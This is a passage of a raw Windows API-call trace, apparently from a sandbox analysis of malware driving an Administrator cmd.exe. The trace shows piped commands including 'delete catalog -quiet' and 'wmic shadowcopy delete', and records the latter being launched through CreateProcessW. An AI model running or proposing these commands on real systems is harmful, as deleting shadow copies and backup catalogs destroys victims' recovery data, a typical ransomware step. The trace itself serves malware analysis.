lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.815] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e32e, cchWideChar=1 | out: lpWideCharStr="adelete catalog -quiet\nquiet\n") returned 1 [0124.815] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.815] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.815] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.815] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e330, cchWideChar=1 | out: lpWideCharStr="delete catalog -quiet\nquiet\n") returned 1 [0124.815] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.815] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.815] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.815] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e332, cchWideChar=1 | out: lpWideCharStr="olete catalog -quiet\nquiet\n") returned 1 [0124.815] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.815] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.815] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.815] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e334, cchWideChar=1 | out: lpWideCharStr="wete catalog -quiet\nquiet\n") returned 1 [0124.815] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.815] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.815] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.816] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e336, cchWideChar=1 | out: lpWideCharStr="cte catalog -quiet\nquiet\n") returned 1 [0124.816] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.816] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.816] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.816] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e338, cchWideChar=1 | out: lpWideCharStr="oe catalog -quiet\nquiet\n") returned 1 [0124.816] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.816] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.816] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.816] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e33a, cchWideChar=1 | out: lpWideCharStr="p catalog -quiet\nquiet\n") returned 1 [0124.816] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.816] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.816] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.816] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e33c, cchWideChar=1 | out: lpWideCharStr="ycatalog -quiet\nquiet\n") returned 1 [0124.816] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.816] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.816] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.816] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e33e, cchWideChar=1 | out: lpWideCharStr=" atalog -quiet\nquiet\n") returned 1 [0124.816] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.816] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.816] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.816] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e340, cchWideChar=1 | out: lpWideCharStr="dtalog -quiet\nquiet\n") returned 1 [0124.816] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.816] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.816] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.816] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e342, cchWideChar=1 | out: lpWideCharStr="ealog -quiet\nquiet\n") returned 1 [0124.816] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.817] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.817] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.817] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e344, cchWideChar=1 | out: lpWideCharStr="llog -quiet\nquiet\n") returned 1 [0124.817] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.817] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.817] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.817] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e346, cchWideChar=1 | out: lpWideCharStr="eog -quiet\nquiet\n") returned 1 [0124.817] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.817] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.817] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.817] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e348, cchWideChar=1 | out: lpWideCharStr="tg -quiet\nquiet\n") returned 1 [0124.817] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.817] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.817] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.817] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e34a, cchWideChar=1 | out: lpWideCharStr="e -quiet\nquiet\n") returned 1 [0124.817] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.817] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.817] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.817] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e34c, cchWideChar=1 | out: lpWideCharStr="\n-quiet\nquiet\n") returned 1 [0124.817] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.817] GetFileType (hFile=0x120) returned 0x3 [0124.817] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.817] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.817] _get_osfhandle (_FileHandle=1) returned 0x12c [0124.817] GetFileType (hFile=0x12c) returned 0x3 [0124.817] _get_osfhandle (_FileHandle=1) returned 0x12c [0124.817] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="wmic shadowcopy delete\n", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wmic shadowcopy delete\n", lpUsedDefaultChar=0x0) returned 24 [0124.818] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x26f818, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f818*=0x17, lpOverlapped=0x0) returned 1 [0124.818] GetProcessHeap () returned 0x460000 [0124.818] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4012) returned 0x47f630 [0124.818] GetProcessHeap () returned 0x460000 [0124.818] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47f630 | out: hHeap=0x460000) returned 1 [0124.818] GetProcessHeap () returned 0x460000 [0124.818] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0) returned 0x4797e0 [0124.818] GetProcessHeap () returned 0x460000 [0124.818] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1a) returned 0x474610 [0124.818] GetProcessHeap () returned 0x460000 [0124.818] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x36) returned 0x476510 [0124.818] GetConsoleOutputCP () returned 0x1b5 [0124.819] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a93bfe0 | out: lpCPInfo=0x4a93bfe0) returned 1 [0124.819] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0124.819] GetConsoleTitleW (in: lpConsoleTitle=0x26f7d0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0124.819] GetProcessHeap () returned 0x460000 [0124.819] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x218) returned 0x461ab0 [0124.819] GetProcessHeap () returned 0x460000 [0124.819] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x40) returned 0x47aa40 [0124.819] GetProcessHeap () returned 0x460000 [0124.819] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x420) returned 0x47ba10 [0124.819] SetErrorMode (uMode=0x0) returned 0x1 [0124.819] SetErrorMode (uMode=0x1) returned 0x0 [0124.819] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47ba20, lpFilePart=0x26f060 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f060*="Desktop") returned 0x25 [0124.819] SetErrorMode (uMode=0x1) returned 0x1 [0124.819] GetProcessHeap () returned 0x460000 [0124.819] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x47ba10, Size=0x66) returned 0x47ba10 [0124.819] GetProcessHeap () returned 0x460000 [0124.819] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x47ba10) returned 0x66 [0124.819] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0124.819] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0124.819] GetProcessHeap () returned 0x460000 [0124.819] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x128) returned 0x461cd0 [0124.819] GetProcessHeap () returned 0x460000 [0124.819] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x240) returned 0x479910 [0124.820] GetProcessHeap () returned 0x460000 [0124.820] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x479910, Size=0x12a) returned 0x479910 [0124.820] GetProcessHeap () returned 0x460000 [0124.820] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x479910) returned 0x12a [0124.820] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.820] GetProcessHeap () returned 0x460000 [0124.820] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe8) returned 0x475b70 [0124.820] GetProcessHeap () returned 0x460000 [0124.820] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x475b70, Size=0x7e) returned 0x475b70 [0124.820] GetProcessHeap () returned 0x460000 [0124.820] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x475b70) returned 0x7e [0124.820] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.820] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffffffffffff [0124.820] GetLastError () returned 0x2 [0124.820] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffffffffffff [0124.820] GetLastError () returned 0x2 [0124.820] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.820] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffffffffffff [0124.821] GetLastError () returned 0x2 [0124.821] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffffffffffff [0124.821] GetLastError () returned 0x2 [0124.821] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.821] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffffffffffff [0124.821] GetLastError () returned 0x2 [0124.821] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffffffffffff [0124.821] GetLastError () returned 0x2 [0124.821] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.821] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0x479f20 [0124.821] FindClose (in: hFindFile=0x479f20 | out: hFindFile=0x479f20) returned 1 [0124.822] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffffffffffff [0124.822] GetLastError () returned 0x2 [0124.822] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0x479f20 [0124.822] FindClose (in: hFindFile=0x479f20 | out: hFindFile=0x479f20) returned 1 [0124.822] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0124.822] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0124.822] GetConsoleTitleW (in: lpConsoleTitle=0x26f320, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0124.822] GetProcessHeap () returned 0x460000 [0124.822] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x21c) returned 0x479a50 [0124.822] GetConsoleTitleW (in: lpConsoleTitle=0x479a60, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0124.822] GetProcessHeap () returned 0x460000 [0124.822] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x479a50, Size=0xa6) returned 0x479a50 [0124.822] GetProcessHeap () returned 0x460000 [0124.822] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x479a50) returned 0xa6 [0124.822] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - wmic shadowcopy delete") returned 1 [0124.823] GetProcessHeap () returned 0x460000 [0124.823] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x479a50 | out: hHeap=0x460000) returned 1 [0124.823] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f0d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f098 | out: lpAttributeList=0x26f0d8, lpSize=0x26f098) returned 1 [0124.823] UpdateProcThreadAttribute (in: lpAttributeList=0x26f0d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f088, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f0d8, lpPreviousValue=0x0) returned 1 [0124.823] GetStartupInfoW (in: lpStartupInfo=0x26f1f0 | out: lpStartupInfo=0x26f1f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x120, hStdOutput=0x12c, hStdError=0x12c)) [0124.823] GetProcessHeap () returned 0x460000 [0124.823] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x20) returned 0x474640 [0124.823] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0124.824] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0124.825] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0124.825] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0124.825] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0124.825] GetProcessHeap () returned 0x460000 [0124.825] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474640 | out: hHeap=0x460000) returned 1 [0124.825] GetProcessHeap () returned 0x460000 [0124.825] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x12) returned 0x478900 [0124.825] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic shadowcopy delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x26f110*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic shadowcopy delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f0c0 | out: lpCommandLine="wmic shadowcopy delete", lpProcessInformation=0x26f0c0*(hProcess=0x54, hThread=0x50, dwProcessId=0x710, dwThreadId=0x2dc)) returned 1 [0124.855] CloseHandle (hObject=0x50) returned 1 [0124.855] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0124.855] GetProcessHeap () returned 0x460000 [0124.855] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47eb10 | out: hHeap=0x460000) returned 1 [0124.855] GetEnvironmentStringsW () returned 0x478980* [0124.855] GetProcessHeap () returned 0x460000 [0124.855] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0e) returned 0x47eb10 [0124.855] FreeEnvironmentStringsW (penv=0x478980) returned 1 [0124.855] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x26e9c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x26e9c8, ReturnLength=0x0) returned 0x0 [0124.855] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffd3000, lpBuffer=0x26ea00, nSize=0x380, lpNumberOfBytesRead=0x26e9c0 | out: lpBuffer=0x26ea00*, lpNumberOfBytesRead=0x26e9c0*=0x380) returned 1 [0124.855] WaitForSingleObject 